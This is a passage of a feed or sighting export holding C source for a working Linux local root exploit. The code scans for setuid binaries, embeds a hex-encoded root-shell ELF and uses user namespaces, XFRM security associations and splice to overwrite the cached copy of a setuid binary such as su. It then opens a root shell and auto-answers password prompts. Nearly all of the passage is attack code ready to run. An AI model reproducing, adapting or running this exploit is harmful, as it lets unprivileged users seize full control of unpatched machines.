S_ISUID)) {\n\t\tsnprintf(why, whylen, \"no setuid bit (mode %04o)\", st.st_mode &amp;amp; 07777);\n\t\treturn -1;\n\t}\n\tif (access(path, R_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not readable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (access(path, X_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not executable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tint fd = open(path, O_RDONLY);\n\tif (fd &amp;lt; 0) {\n\t\tsnprintf(why, whylen, \"open(O_RDONLY) denied (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tclose(fd);\n\twhy[0] = '\\0';\n\treturn 0;\n}\n\nstatic int setuid_walk(const char *path, const struct stat *st, int flag,\n\t\t       struct FTW *ftw)\n{\n\t(void)ftw;\n\tif (flag == FTW_D &amp;amp;&amp;amp; skip_tree(path))\n\t\treturn FTW_SKIP_SUBTREE;\n\n\tif (flag != FTW_F)\n\t\treturn 0;\n\n\tif (!S_ISREG(st-&amp;gt;st_mode))\n\t\treturn 0;\n\tif (!(st-&amp;gt;st_mode &amp;amp; S_ISUID))\n\t\treturn 0;\n\n\tg_setuid_count++;\n\tint exploitable = target_is_exploitable(path);\n\tif (exploitable)\n\t\tg_exploitable_count++;\n\n\tint is_target = (strcmp(path, g_target) == 0);\n\tconst char *color = exploitable ? C(C_GRN) : C(C_YEL);\n\tconst char *badge = exploitable ? \"[+]\" : \"[~]\";\n\n\tprintf(\"  %s%02d%s %s%s%s %s%s%s%s\\n\",\n\t       C(C_DIM), g_setuid_count, C(C_RST),\n\t       color, badge, C(C_RST), path,\n\t       is_target ? \"  \u2190 target\" : \"\",\n\t       exploitable ? \"\" : \"  (visible, not usable)\",\n\t       C(C_RST));\n\treturn 0;\n}\n\nstatic int scan_setuid_binaries(void)\n{\n\tphase_header(3, \"setuid binary scan\");\n\tprintf(\"  %s\u2192%s find / -perm -4000 -type f 2&amp;gt;/dev/null%s\\n\\n\",\n\t       C(C_DIM), C(C_RST), C(C_DIM));\n\n\tg_setuid_count = 0;\n\tg_exploitable_count = 0;\n\tint rc = nftw(\"/\", setuid_walk, 32, FTW_PHYS | FTW_MOUNT);\n\n\tprintf(\"\\n\");\n\tif (rc != 0 &amp;amp;&amp;amp; rc != EACCES) {\n\t\tstatus_line(\"nftw\", 0, strerror(rc &amp;gt; 0 ? 
rc : errno));\n\t}\n\tif (g_setuid_count == 0) {\n\t\tstatus_line(\"setuid\", 0, \"no SUID binaries found\");\n\t\treturn -1;\n\t}\n\tprintf(\"%s  found %d setuid binaries, %d exploitable (readable + openable).%s\\n\",\n\t       g_exploitable_count ? C(C_GRN) : C(C_YEL),\n\t       g_setuid_count, g_exploitable_count, C(C_RST));\n\tif (g_exploitable_count == 0) {\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] SUID files are visible but not readable \u2014 typical on shared hosting (CageFS/cPanel).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] This exploit must open the target for read (splice). No usable target on this account.%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"\\n\");\n\treturn 0;\n}\n\n// minimal x86_64 root-shell ELF, entry=0x400078\n// setgid(0); setuid(0); execve(\"/bin/sh\", NULL, [\"TERM=xterm\",NULL]) \nstatic const unsigned char shell_elf[PAYLOAD_LEN] = {\n\t0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,\n\t0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,\n\t0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,\n\t0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,\n\t0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n};\n\nstatic int save_original(const char 
*path)\n{\n\tif (g_have_backup) return 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd &amp;lt; 0) return -1;\n\tint n = read(fd, g_backup, PAYLOAD_LEN);\n\tclose(fd);\n\tif (n != PAYLOAD_LEN) return -1;\n\tg_have_backup = 1;\n\treturn 0;\n}\n\nstatic int setup_userns_netns(void)\n{\n\tuid_t ruid = getuid();\n\tgid_t rgid = getgid();\n\n\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) &amp;lt; 0) {\n\t\tfprintf(stderr, \"unshare: %s\\n\", strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint fd = open(\"/proc/self/setgroups\", O_WRONLY);\n\tif (fd &amp;gt;= 0) { write(fd, \"deny\\n\", 5); close(fd); }\n\n\tchar buf[128];\n\tsnprintf(buf, sizeof(buf), \"0 %u 1\", ruid);\n\tfd = open(\"/proc/self/uid_map\", O_WRONLY);\n\tif (fd &amp;lt; 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tsnprintf(buf, sizeof(buf), \"0 %u 1\", rgid);\n\tfd = open(\"/proc/self/gid_map\", O_WRONLY);\n\tif (fd &amp;lt; 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tint s = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (s &amp;gt;= 0) {\n\t\tstruct ifreq ifr;\n\t\tmemset(&amp;amp;ifr, 0, sizeof(ifr));\n\t\tstrncpy(ifr.ifr_name, \"lo\", IFNAMSIZ - 1);\n\t\tif (ioctl(s, SIOCGIFFLAGS, &amp;amp;ifr) == 0) {\n\t\t\tifr.ifr_flags |= IFF_UP | IFF_RUNNING;\n\t\t\tioctl(s, SIOCSIFFLAGS, &amp;amp;ifr);\n\t\t}\n\t\tclose(s);\n\t}\n\treturn 0;\n}\n\nstatic void nl_put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)\n{\n\tstruct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh-&amp;gt;nlmsg_len));\n\trta-&amp;gt;rta_type = type;\n\trta-&amp;gt;rta_len  = RTA_LENGTH(len);\n\tmemcpy(RTA_DATA(rta), data, len);\n\tnlh-&amp;gt;nlmsg_len = NLMSG_ALIGN(nlh-&amp;gt;nlmsg_len) + RTA_ALIGN(rta-&amp;gt;rta_len);\n}\n\nstatic int add_xfrm_sa(uint32_t spi, uint32_t patch_val)\n{\n\tint sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);\n\tif (sk &amp;lt; 0) return -1;\n\n\tstruct sockaddr_nl nl = { .nl_family = AF_NETLINK };\n\tif (bind(sk, (struct sockaddr *)&amp;amp;nl, 
sizeof(nl)) &amp;lt; 0) { close(sk); return -1; }\n\n\tchar buf[4096];\n\tmemset(buf, 0, sizeof(buf));\n\tstruct nlmsghdr *nlh = (struct nlmsghdr *)buf;\n\tnlh-&amp;gt;nlmsg_type  = XFRM_MSG_NEWSA;\n\tnlh-&amp;gt;nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;\n\tnlh-&amp;gt;nlmsg_pid   = getpid();\n\tnlh-&amp;gt;nlmsg_seq   = 1;\n\tnlh-&amp;gt;nlmsg_len   = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));\n\n\tstruct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);\n\txs-&amp;gt;id.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs-&amp;gt;id.spi      = htonl(spi);\n\txs-&amp;gt;id.proto    = IPPROTO_ESP;\n\txs-&amp;gt;saddr.a4    = inet_addr(\"127.0.0.1\");\n\txs-&amp;gt;family      = AF_INET;\n\txs-&amp;gt;mode          = XFRM_MODE_TRANSPORT;\n\txs-&amp;gt;replay_window = 0;\n\txs-&amp;gt;reqid         = 0x1234;\n\txs-&amp;gt;flags         = XFRM_STATE_ESN;\n\txs-&amp;gt;lft.soft_byte_limit   = (uint64_t)-1;\n\txs-&amp;gt;lft.hard_byte_limit   = (uint64_t)-1;\n\txs-&amp;gt;lft.soft_packet_limit = (uint64_t)-1;\n\txs-&amp;gt;lft.hard_packet_limit = (uint64_t)-1;\n\txs-&amp;gt;sel.family  = AF_INET;\n\txs-&amp;gt;sel.prefixlen_d = 32;\n\txs-&amp;gt;sel.prefixlen_s = 32;\n\txs-&amp;gt;sel.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs-&amp;gt;sel.saddr.a4 = inet_addr(\"127.0.0.1\");\n\n\tchar auth_buf[sizeof(struct xfrm_algo_auth) + 32];\n\tmemset(auth_buf, 0, sizeof(auth_buf));\n\tstruct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)auth_buf;\n\tstrncpy(aa-&amp;gt;alg_name, \"hmac(sha256)\", sizeof(aa-&amp;gt;alg_name) - 1);\n\taa-&amp;gt;alg_key_len   = 32 * 8;\n\taa-&amp;gt;alg_trunc_len = 128;\n\tmemset(aa-&amp;gt;alg_key, 0xAA, 32);\n\tnl_put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, auth_buf, sizeof(auth_buf));\n\n\tchar ciph_buf[sizeof(struct xfrm_algo) + 16];\n\tmemset(ciph_buf, 0, sizeof(ciph_buf));\n\tstruct xfrm_algo *ea = (struct xfrm_algo *)ciph_buf;\n\tstrncpy(ea-&amp;gt;alg_name, \"cbc(aes)\", sizeof(ea-&amp;gt;alg_name) - 1);\n\tea-&amp;gt;alg_key_len = 16 * 
8;\n\tmemset(ea-&amp;gt;alg_key, 0xBB, 16);\n\tnl_put_attr(nlh, XFRMA_ALG_CRYPT, ciph_buf, sizeof(ciph_buf));\n\n\tstruct xfrm_encap_tmpl enc;\n\tmemset(&amp;amp;enc, 0, sizeof(enc));\n\tenc.encap_type  = UDP_ENCAP_ESPINUDP;\n\tenc.encap_sport = htons(ENC_PORT);\n\tenc.encap_dport = htons(ENC_PORT);\n\tnl_put_attr(nlh, XFRMA_ENCAP, &amp;amp;enc, sizeof(enc));\n\n\tstruct xfrm_replay_state_esn esn;\n\tmemset(&amp;amp;esn, 0, sizeof(esn));\n\tesn.bmp_len       = 1;\n\tesn.oseq          = 0;\n\tesn.seq           = REPLAY_SEQ;\n\tesn.oseq_hi       = 0;\n\tesn.seq_hi        = patch_val;\n\tesn.replay_window = 32;\n\tnl_put_attr(nlh, XFRMA_REPLAY_ESN_VAL, &amp;amp;esn, sizeof(esn) + 4);\n\n\tif (send(sk, nlh, nlh-&amp;gt;nlmsg_len, 0) &amp;lt; 0) { close(sk); return -1; }\n\n\tchar rbuf[4096];\n\tint n = recv(sk, rbuf, sizeof(rbuf), 0);\n\tclose(sk);\n\tif (n &amp;lt; 0) return -1;\n\n\tstruct nlmsghdr *rh = (struct nlmsghdr *)rbuf;\n\tif (rh-&amp;gt;nlmsg_type == NLMSG_ERROR) {\n\t\tstruct nlmsgerr *e = NLMSG_DATA(rh);\n\t\tif (e-&amp;gt;error) return -1;\n\t}\n\treturn 0;\n}\n\nstatic int do_one_write(const char *path, off_t offset, uint32_t spi)\n{\n\tint sk_recv = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_recv &amp;lt; 0) return -1;\n\n\tint one = 1;\n\tsetsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &amp;amp;one, sizeof(one));\n\n\tstruct sockaddr_in sa;\n\tmemset(&amp;amp;sa, 0, sizeof(sa));\n\tsa.sin_family = AF_INET;\n\tsa.sin_port   = htons(ENC_PORT);\n\tsa.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\n\tif (bind(sk_recv, (struct sockaddr *)&amp;amp;sa, sizeof(sa)) &amp;lt; 0) { close(sk_recv); return -1; }\n\n\tint encap = UDP_ENCAP_ESPINUDP;\n\tif (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &amp;amp;encap, sizeof(encap)) &amp;lt; 0) { close(sk_recv); return -1; }\n\n\tint sk_send = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_send &amp;lt; 0) { close(sk_recv); return -1; }\n\tif (connect(sk_send, (struct sockaddr *)&amp;amp;sa, sizeof(sa)) &amp;lt; 0) { 
close(sk_send); close(sk_recv); return -1; }\n\n\tint file_fd = open(path, O_RDONLY);\n\tif (file_fd &amp;lt; 0) { close(sk_send); close(sk_recv); return -1; }\n\n\tint pfd[2];\n\tif (pipe(pfd) &amp;lt; 0) { close(file_fd); close(sk_send); close(sk_recv); return -1; }\n\n\tunsigned char hdr[24];\n\t*(uint32_t *)(hdr + 0) = htonl(spi);\n\t*(uint32_t *)(hdr + 4) = htonl(SEQ_VAL);\n\tmemset(hdr + 8, 0xCC, 16);\n\n\tstruct iovec iov = { .iov_base = hdr, .iov_len = sizeof(hdr) };\n\tif (vmsplice(pfd[1], &amp;amp;iov, 1, 0) != (ssize_t)sizeof(hdr))\n\t\tgoto fail;\n\n\toff_t off = offset;\n\tif (splice(file_fd, &amp;amp;off, pfd[1], NULL, 16, SPLICE_F_MOVE) != 16)\n\t\tgoto fail;\n\n\tssize_t s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);\n\tusleep(150 * 1000);\n\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn (s == 40) ? 0 : -1;\n\nfail:\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn -1;\n}\n\n/* corrupt stage error codes (child maps to exit 11..13) */\n#define CORRUPT_ERR_UNSHARE 1\n#define CORRUPT_ERR_XFRM    2\n#define CORRUPT_ERR_WRITE   3\n\nstatic int corrupt_su(void)\n{\n\tif (setup_userns_netns() &amp;lt; 0)\n\t\treturn CORRUPT_ERR_UNSHARE;\n\tusleep(100 * 1000);\n\n\tfor (int i = 0; i &amp;lt; TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\tuint32_t val =\n\t\t\t((uint32_t)shell_elf[i * 4 + 0] &amp;lt;&amp;lt; 24) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 1] &amp;lt;&amp;lt; 16) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 2] &amp;lt;&amp;lt;  8) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 3]);\n\t\tif (add_xfrm_sa(spi, val) &amp;lt; 0)\n\t\t\treturn CORRUPT_ERR_XFRM;\n\t}\n\n\tfor (int i = 0; i &amp;lt; TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\toff_t off = PATCH_OFFSET + (off_t)i * 4;\n\t\tif (do_one_write(g_target, off, spi) &amp;lt; 0)\n\t\t\treturn CORRUPT_ERR_WRITE;\n\t}\n\treturn 0;\n}\n\nstatic const char 
*corrupt_err_msg(int code)\n{\n\tswitch (code) {\n\tcase CORRUPT_ERR_UNSHARE: return \"unshare / uid_map / lo setup failed in child\";\n\tcase CORRUPT_ERR_XFRM:    return \"XFRM SA registration failed (netlink denied?)\";\n\tcase CORRUPT_ERR_WRITE:   return \"splice/UDP 4500 write failed\";\n\tdefault:                  return \"unknown corrupt error\";\n\t}\n}\n\nstatic int target_already_patched(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd &amp;lt; 0)\n\t\treturn 0;\n\tuint8_t got[8];\n\tssize_t n = pread(fd, got, sizeof(got), ENTRY_OFFSET);\n\tclose(fd);\n\tif (n != (ssize_t)sizeof(got))\n\t\treturn 0;\n\treturn memcmp(got, su_marker, sizeof(su_marker)) == 0;\n}\n\nstatic int verify_patch(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd &amp;lt; 0)\n\t\treturn -1;\n\tuint8_t got[8];\n\tif (pread(fd, got, sizeof(got), ENTRY_OFFSET) != (ssize_t)sizeof(got)) {\n\t\tclose(fd);\n\t\treturn -1;\n\t}\n\tclose(fd);\n\treturn memcmp(got, su_marker, sizeof(su_marker)) == 0 ? 0 : -1;\n}\n\nstatic int run_esp_corrupt_stage(char *detail, size_t dlen)\n{\n\tpid_t cpid = fork();\n\tif (cpid &amp;lt; 0) {\n\t\tsnprintf(detail, dlen, \"fork: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (cpid == 0) {\n\t\tint rc = corrupt_su();\n\t\t_exit(rc == 0 ? 
0 : 10 + rc);\n\t}\n\tint wstatus;\n\tif (waitpid(cpid, &amp;amp;wstatus, 0) &amp;lt; 0) {\n\t\tsnprintf(detail, dlen, \"waitpid: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!WIFEXITED(wstatus)) {\n\t\tsnprintf(detail, dlen, \"child killed by signal %d\", WTERMSIG(wstatus));\n\t\treturn -1;\n\t}\n\tint est = WEXITSTATUS(wstatus);\n\tif (est != 0) {\n\t\tsnprintf(detail, dlen, \"%s\", corrupt_err_msg(est - 10));\n\t\treturn -1;\n\t}\n\tif (verify_patch(g_target) &amp;lt; 0) {\n\t\tsnprintf(detail, dlen,\n\t\t\t \"page cache unchanged at 0x%x (patched kernel / LSM / container?)\",\n\t\t\t ENTRY_OFFSET);\n\t\treturn -1;\n\t}\n\tdetail[0] = '\\0';\n\treturn 0;\n}\n\nstatic int target_is_su_binary(const char *path)\n{\n\tconst char *base = strrchr(path, '/');\n\tbase = base ? base + 1 : path;\n\treturn strcmp(base, \"su\") == 0;\n}\n\nstatic void exec_patched_target(void)\n{\n\tchar *envp[] = { \"TERM=xterm\", NULL };\n\texecle(g_target, g_target, NULL, envp);\n\t_exit(127);\n}\n\nstatic void exec_su_login(void)\n{\n\tstatic const char *paths[] = {\n\t\t\"/bin/su\", \"/usr/bin/su\", \"/sbin/su\", \"/usr/sbin/su\", NULL,\n\t};\n\tfor (int i = 0; paths[i]; i++)\n\t\texecl(paths[i], \"su\", \"-\", (char *)NULL);\n\texeclp(\"su\", \"su\", \"-\", (char *)NULL);\n\t_exit(127);\n}\n\nstatic int run_root_pty(void)\n{\n\tint master = posix_openpt(O_RDWR | O_NOCTTY);\n\tif (master &amp;lt; 0)\n\t\treturn -1;\n\tif (grantpt(master) &amp;lt; 0 || unlockpt(master) &amp;lt; 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tchar *slave_name = ptsname(master);\n\tif (!slave_name) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\n\tstruct winsize ws;\n\tif (ioctl(STDIN_FILENO, TIOCGWINSZ, &amp;amp;ws) == 0)\n\t\tioctl(master, TIOCSWINSZ, &amp;amp;ws);\n\n\tpid_t pid = fork();\n\tif (pid &amp;lt; 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tsetsid();\n\t\tint slave = open(slave_name, O_RDWR);\n\t\tif (slave &amp;lt; 0)\n\t\t\t_exit(127);\n\t\tioctl(slave, 
TIOCSCTTY, 0);\n\t\tdup2(slave, 0);\n\t\tdup2(slave, 1);\n\t\tdup2(slave, 2);\n\t\tif (slave &amp;gt; 2)\n\t\t\tclose(slave);\n\t\tclose(master);\n\t\tif (target_is_su_binary(g_target))\n\t\t\texec_su_login();\n\t\texec_patched_target();\n\t}\n\n\tsignal(SIGTTOU, SIG_IGN);\n\tsignal(SIGTTIN, SIG_IGN);\n\tsignal(SIGPIPE, SIG_IGN);\n\tsignal(SIGHUP, SIG_IGN);\n\n\tstruct termios saved_termios;\n\tint restore_termios = 0;\n\tif (tcgetattr(STDIN_FILENO, &amp;amp;saved_termios) == 0) {\n\t\tstruct termios raw = saved_termios;\n\t\tcfmakeraw(&amp;amp;raw);\n\t\tif (tcsetattr(STDIN_FILENO, TCSANOW, &amp;amp;raw) == 0)\n\t\t\trestore_termios = 1;\n\t}\n\n\tint auto_pw_sent = 0;\n\tint stdin_eof = 0;\n\tint saw_master_output = 0;\n\tint total_ms = 0;\n\tchar buf[4096];\n\n\tfor (;;) {\n\t\tstruct pollfd pfds[2] = {\n\t\t\t{ stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 },\n\t\t\t{ master, POLLIN, 0 },\n\t\t};\n\t\tint pr = poll(pfds, 2, 200);\n\t\tif (pr &amp;lt; 0 &amp;amp;&amp;amp; errno != EINTR)\n\t\t\tbreak;\n\t\ttotal_ms += 200;\n\n\t\tif (pfds[1].revents &amp;amp; POLLIN) {\n\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\tif (n &amp;lt;= 0)\n\t\t\t\tbreak;\n\t\t\tsaw_master_output = 1;\n\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\tif (!auto_pw_sent &amp;amp;&amp;amp; n &amp;lt; (ssize_t)sizeof(buf)) {\n\t\t\t\tbuf[n] = '\\0';\n\t\t\t\tif (strstr(buf, \"Password\") || strstr(buf, \"password\")) {\n\t\t\t\t\twrite(master, \"\\n\", 1);\n\t\t\t\t\tauto_pw_sent = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif (!stdin_eof &amp;amp;&amp;amp; (pfds[0].revents &amp;amp; POLLIN)) {\n\t\t\tssize_t n = read(STDIN_FILENO, buf, sizeof(buf));\n\t\t\tif (n &amp;lt;= 0)\n\t\t\t\tstdin_eof = 1;\n\t\t\telse\n\t\t\t\twrite(master, buf, n);\n\t\t}\n\t\tif (pfds[1].revents &amp;amp; (POLLHUP | POLLERR))\n\t\t\tbreak;\n\n\t\tif (!auto_pw_sent &amp;amp;&amp;amp; !saw_master_output &amp;amp;&amp;amp; total_ms &amp;gt;= 1500) {\n\t\t\twrite(master, \"\\n\", 1);\n\t\t\tauto_pw_sent = 
1;\n\t\t}\n\n\t\tint status;\n\t\tpid_t w = waitpid(pid, &amp;amp;status, WNOHANG);\n\t\tif (w == pid) {\n\t\t\tfor (int i = 0; i &amp;lt; 5; i++) {\n\t\t\t\tstruct pollfd pf = { master, POLLIN, 0 };\n\t\t\t\tif (poll(&amp;amp;pf, 1, 50) &amp;lt;= 0)\n\t\t\t\t\tbreak;\n\t\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\t\tif (n &amp;lt;= 0)\n\t\t\t\t\tbreak;\n\t\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\t}\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (restore_termios)\n\t\ttcsetattr(STDIN_FILENO, TCSANOW, &amp;amp;saved_termios);\n\tclose(master);\n\treturn 0;\n}\n\nstatic int restore_original(void)\n{\n\tif (!g_have_backup) return -1;\n\n\t// just drop the file's page cache -&amp;gt; kernel reloads from disk\n\tint fd = open(g_target, O_RDONLY);\n\tif (fd &amp;lt; 0) return -1;\n\tposix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);\n\tclose(fd);\n\n\t// verify first 8 bytes match backup (disk copy)\n\tunsigned char cur[8];\n\tfd = open(g_target, O_RDONLY);\n\tif (fd &amp;lt; 0) return -1;\n\tint n = pread(fd, cur, 8, 0);\n\tclose(fd);\n\tif (n != 8) return -1;\n\tif (memcmp(cur, g_backup, 8) != 0) return -1;\n\n\treturn 0;\n}\n\nstatic void parse_args(int argc, char **argv)\n{\n\tfor (int i = 1; i &amp;lt; argc; i++) {\n\t\tif (!strcmp(argv[i], \"-v\") || !strcmp(argv[i], \"--verbose\"))\n\t\t\tg_verbose = 1;\n\t\telse if (argv[i][0] != '-')\n\t\t\tg_target = argv[i];\n\t}\n\tif (getenv(\"DIRTYFRAG_VERBOSE\"))\n\t\tg_verbose = 1;\n}\n\nint main(int argc, char **argv)\n{\n\tg_tty = isatty(STDOUT_FILENO);\n\tsetlinebuf(stdout);\n\tparse_args(argc, argv);\n\n\tif (getuid() == 0) {\n\t\texeclp(\"/bin/bash\", \"bash\", (char *)NULL);\n\t\t_exit(1);\n\t}\n\n\tprint_banner();\n\n\tif (check_kernel_config() &amp;lt; 0)\n\t\treturn 1;\n\n\tif (check_userns_runtime() &amp;lt; 0)\n\t\treturn 1;\n\n\tif (scan_setuid_binaries() &amp;lt; 0)\n\t\treturn 1;\n\n\tphase_header(4, \"ESP corrupt (XFRM/UDP 4500)\");\n\tprintf(\"  %s\u2192%s target: %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_MAG), 
g_target, C(C_RST));\n\n\t{\n\t\tchar why[256];\n\t\tif (probe_target(g_target, why, sizeof(why)) &amp;lt; 0) {\n\t\t\tstatus_line(\"target\", 0, why);\n\t\t\tfprintf(stderr,\n\t\t\t\t\"\\n%s  [!] Exploit needs read+execute on the setuid binary (open for splice).%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s  [!] Shared hosting often blocks reading /usr/bin/su even though 'find' lists it.%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s  [!] Use a full VM/VPS/lab where you can: cat %s | head -c 4%s\\n\\n\",\n\t\t\t\tC(C_YEL), g_target, C(C_RST));\n\t\t\treturn 1;\n\t\t}\n\t}\n\tstatus_line(\"target\", 1, \"setuid + readable + openable\");\n\n\tif (target_already_patched(g_target)) {\n\t\tstatus_line(\"patch\", 1, \"already patched \u2014 skip corrupt stage\");\n\t} else {\n\t\tif (save_original(g_target) &amp;lt; 0) {\n\t\t\tstatus_line(\"backup\", 0, \"failed to save 192 original bytes\");\n\t\t\treturn 1;\n\t\t}\n\t\tstatus_line(\"backup\", 1, \"192 bytes saved\");\n\n\t\tprintf(\"\\n%s  [*] unshare userns+netns, register %d XFRM SA, splice\u2192UDP 4500...%s\\n\",\n\t\t       C(C_YEL), TOTAL_SAS, C(C_RST));\n\n\t\t{\n\t\t\tchar err[256];\n\t\t\tif (run_esp_corrupt_stage(err, sizeof(err)) &amp;lt; 0) {\n\t\t\t\tstatus_line(\"corrupt\", 0, err[0] ? err : \"ESP path failed\");\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"\\n%s  [!] Common on shared/VPS hosts: XFRM netlink blocked, splice restricted, or kernel patched.%s\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"%s  [!] Try: uname -r  and test on WSL2/lab. 
Without userns: CVE-2026-43500 (rxrpc).%s\\n\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\treturn 1;\n\t\t\t}\n\t\t}\n\t\tstatus_line(\"corrupt\", 1, \"all iterations done\");\n\t\tstatus_line(\"verify\", 1, \"shellcode marker at 0x78 OK\");\n\t}\n\n\tphase_header(5, \"root shell\");\n\tprintf(\"\\n%s\", C(C_GRN));\n\tprintf(\"  \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\"  \u2551  root shell \u2014 exit to restore        \u2551\\n\");\n\tprintf(\"  \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n\n\tprintf(\"  %s\u2192%s spawn: %s%s\\n\\n\", C(C_DIM), C(C_RST), g_target, C(C_RST));\n\tif (run_root_pty() &amp;lt; 0) {\n\t\tstatus_line(\"pty\", 0, \"PTY failed, trying direct exec\");\n\t\texec_patched_target();\n\t\tfprintf(stderr, \"%s  [!] exec %s: %s%s\\n\", C(C_RED), g_target, strerror(errno), C(C_RST));\n\t\treturn 1;\n\t}\n\n\tprintf(\"\\n%s  [*] shell closed \u2014 restoring page cache...%s\\n\", C(C_YEL), C(C_RST));\n\tif (restore_original() &amp;lt; 0) {\n\t\tfprintf(stderr, \"%s  [!] restore failed \u2014 try: echo 3 | sudo tee /proc/sys/vm/drop_caches%s\\n\",\n\t\t        C(C_RED), C(C_RST));\n\t\treturn 1;\n\t}\n\tprintf(\"%s  [+] target restored from disk.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n", "creation_timestamp": "2026-05-26T12:10:20.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/a33a231b-aea3-4d29-9f58-276e517078f6/export"/>
